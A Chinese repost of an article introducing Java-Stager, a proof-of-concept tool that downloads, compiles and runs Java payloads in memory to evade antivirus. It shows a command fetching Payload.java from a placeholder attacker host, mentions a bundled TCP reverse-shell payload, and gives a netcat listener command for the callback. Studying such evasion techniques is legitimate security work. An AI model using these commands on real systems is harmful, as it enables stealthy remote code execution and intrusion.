内容简介:今天给大家介绍的是一款名叫Java-Stager的工具,在该工具的帮助下,我们可以轻松地在内存中下载、编译和执行Java文件(代码)。注意:需要提醒大家一下,该项目仅供研究及测试使用,请不要将其用于恶意目的。
今天给大家介绍的是一款名叫Java-Stager的工具,在该 工具 的帮助下,我们可以轻松地在内存中下载、编译和执行 Java 文件(代码)。
注意:需要提醒大家一下,该项目仅供研究及测试使用,请不要将其用于恶意目的。
Java-Stager介绍
本项目基于James Williams的演讲《下一代反病毒引擎vs我的垃圾代码》所开发,感兴趣的同学可以观看他的演讲视频以获取更多的灵感:
视频地址:
看不到?点 这里
演讲内容的关键点:
1. 如何在目标设备中加载一个Stager(需要使用合法代码触及目标磁盘); 2. Stager通过HTTP下载源码(驻留在内存中); 3. Stager编译源码(同样在内存中进行); 4. Stager执行编译代码(同样在内存中进行);
不过他的研究主要基于的是.net,不过我认为这种技术同样能够应用到Java中,所以我就设计了这样一个PoC来验证上述技术的可行性。
如何使用?
1. 克隆整个项目代码; 2. 在能够使用maven的IDE编辑器(例如NetBeans)中打开项目目录; 3. Stager和样本Payload可以在项目目录的”/src/main/java”中找到; 4. 选择你喜欢的Stager,然后编译项目代码,我在默认配置中选择的是“clean/build”;
Netbeans中的输出结果应该跟下面的代码类似:
Buildingjar:C:\Users\cornerpirate\Documents\NetBeansProjects\java-stager\target\JavaStager-0.1-initial.jar
在目标主机中,你需要上传“JavaStageer*.jar”文件以及包含了Janino(从项目的“target”目录中获取)的“lib”文件夹。下面的命令将会执行stager:
java-jar JavaStager-0.1-initial.jar
下面这条命令可以给你提供相关文件的使用信息:
ProperUsage is: java -jar JavaStager-0.1-initial.jar <url>
其中的“url”是命令唯一需要的参数,该参数将会传递给Stager,下面给出的是一个使用样例:
java-jar JavaStager-0.1-initial.jar http://attackerip/Payload.java
你的Payload必须存储在一个名叫“Payload.java”的文件中,你的漏洞利用代码必须写在名叫“Run”的静态方法内。如果你想自己开发的话,可以参考下面这个模版代码:
publicclass Payload { public static void Run() { // Your code here } }
我在“TCPReverseShell.java”文件中还提供了一个可供参考的反向TCP Payload,为了防止命名冲突,我就不将其取名为“Payload.java”了,如果你想了解“TCPReverseShell.java”的详细工作机制并进行定制开发的话,可以参考该文件Header中的注释内容。
除此之外,你可能还需要在自己的HTTP服务器上托管你的“Payload.java”文件,如果你只想使用简单的HTTP/HTTPS服务(Python2或 Python 3)的话,我建议你用Apache【 参考资料 】。
除此之外。攻击端还需要启动一个netcat监听器并使用标准nc -lvp 8044技术来捕捉链接回调。
参考资料
Java-Stager工作机制介绍:【 传送门 】
工具实际操作演示:【 传送门 】
* 参考来源: java-stager ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- Alibaba Arthas 3.1.0版本:在线教程、内存编译器和强大的自动补全
- Xcode 编译疾如风系列(二):并行编译
- 编写 MSBuild 内联编译任务(Task)用于获取当前编译环境下的所有编译目标(Target)
- 使用 Visual Studio 编译时,让错误一开始发生时就停止编译(以便及早排查编译错误节省时间)
- Go编译缓存导致C文件修改后未重新编译
- Android Apk反编译系列教程(一)如何反编译APK
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
打火机与公主裙·荒草园
Twentine / 青岛出版社 / 2017-3 / 36.00元
“如果人临死前真有走马灯这个环节,她大概会是我这辈子见的最后一人。” 从青涩的校园时代里一抹明亮的金,到厮杀的职场中那化不开的黑,李峋就像荒芜之地的一株野草,受到再大的挫折依然固执地生长。 如果说朱韵从前的生活一直维持着表面的顺风顺水,平静安和,那李峋的出现则打破了这一切。他是她生命中第一次,也是唯一一次的冒险。 在外人眼里李峋嚣张而轻蔑,只有朱韵懂得他心中那片自留地,自愿成为孤......一起来看看 《打火机与公主裙·荒草园》 这本书的介绍吧!
HTML 压缩/解压工具
在线压缩/解压 HTML 代码
正则表达式在线测试
正则表达式在线测试